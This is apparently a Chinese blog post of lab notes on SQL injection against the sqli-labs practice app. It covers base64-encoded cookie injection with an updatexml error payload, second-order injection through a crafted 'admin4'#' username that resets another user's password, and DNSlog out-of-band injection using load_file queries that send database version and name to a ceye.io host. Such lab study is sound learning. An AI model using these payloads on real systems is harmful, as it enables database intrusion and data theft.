1、加解密注入
sqli-labs-master(LESS-21)靶机示例
数据包抓包,找到cookie数据包
Cookie: uname=YWRtaW4%3D%3D是URL编码里的=,所以直接改为等号,在base64里解密
这里想要注入直接写and 1=1不现实,对admin' and 1=1加密后再提交给数据包
这里直接报错注入,在这之前需要Base64加密
'or updatexml(1,concat(0x7e,version(),0x7e),0) or'
2、二次注入
二次注入一般用于白盒测试(能够看到源代码)
应用场景---在前端和URL(黑盒测试)是无法发现二次注入,无法用工具扫描,只有在代码审计时才能发现是否存在二次注入
sqli-labs-master(LESS-24)靶机示例
在命令符中查看现有用户名,注册一个admin4'#
mysql> select * from users;
+----+----------+------------+
| id | username | password |
+----+----------+------------+
| 1 | Dumb | Dumb |
| 2 | Angelina | I-kill-you |
| 3 | Dummy | p@ssword |
| 4 | secure | crappy |
| 5 | stupid | stupidity |
| 6 | superman | genious |
| 7 | batman | mob!le |
| 8 | admin | admin |
| 9 | admin1 | admin1 |
| 10 | admin2 | admin2 |
| 11 | admin3 | admin3 |
| 12 | dhakkan | dumbo |
| 14 | admin4 | admin4 |
+----+----------+------------+登录成功后修改密码为123456
+----+----------+------------+
| id | username | password |
+----+----------+------------+
| 1 | Dumb | Dumb |
| 2 | Angelina | I-kill-you |
| 3 | Dummy | p@ssword |
| 4 | secure | crappy |
| 5 | stupid | stupidity |
| 6 | superman | genious |
| 7 | batman | mob!le |
| 8 | admin | admin |
| 9 | admin1 | admin1 |
| 10 | admin2 | admin2 |
| 11 | admin3 | admin3 |
| 12 | dhakkan | dumbo |
| 14 | admin4 | 123456 |
| 15 | admin4'# | 123123 |
+----+----------+------------+发现admin4的密码被修改了,而admin4'#没被修改,找到网站相应的php文件查看源代码
//源代码是这样的,把用户带进去
$sql = "UPDATE users SET PASSWORD='$pass' where username='$username' and password='$curr_pass' ";
$sql = "UPDATE users SET PASSWORD='$pass' where username='admin4'#' and password='$curr_pass' ";这里可以看到'#把后面的 'and password='$curr_pass' "; 给屏蔽掉了,所以选择的是admin4而不是admin4'#
现在在登录或者注册的时候都会遇到限制长度,如果限制语句是写在前端语句中是可以突破的,后端则不行
3、dnslog注入
DNSlog:解决了盲注不能回显数据,效率低的问题
涉及资源:http://ceye.io
参考资料:https://www.cnblogs.com/xhds/p/12322839.html
mysql> select * from users where id=1 and if((select load_file(concat('\\\\',(select version()),'.p6clx0.ceye.io\\abc'))),1,0);
Empty set (35.47 sec)
mysql> select * from users where id=1 and if((select load_file(concat('\\\\',(select version()),'.p6clx0.ceye.io\\abc'))),1,0);
Empty set (33.88 sec)
mysql> select * from users where id=1 and if((select load_file(concat('\\\\',(select database()),'.p6clx0.ceye.io\\abc'))),1,0);
Empty set (33.92 sec)
标签:WEB,users,加解密,admin4,+----+----------+------------+,password,select,注入 From: https://www.cnblogs.com/Zx770/p/17444251.html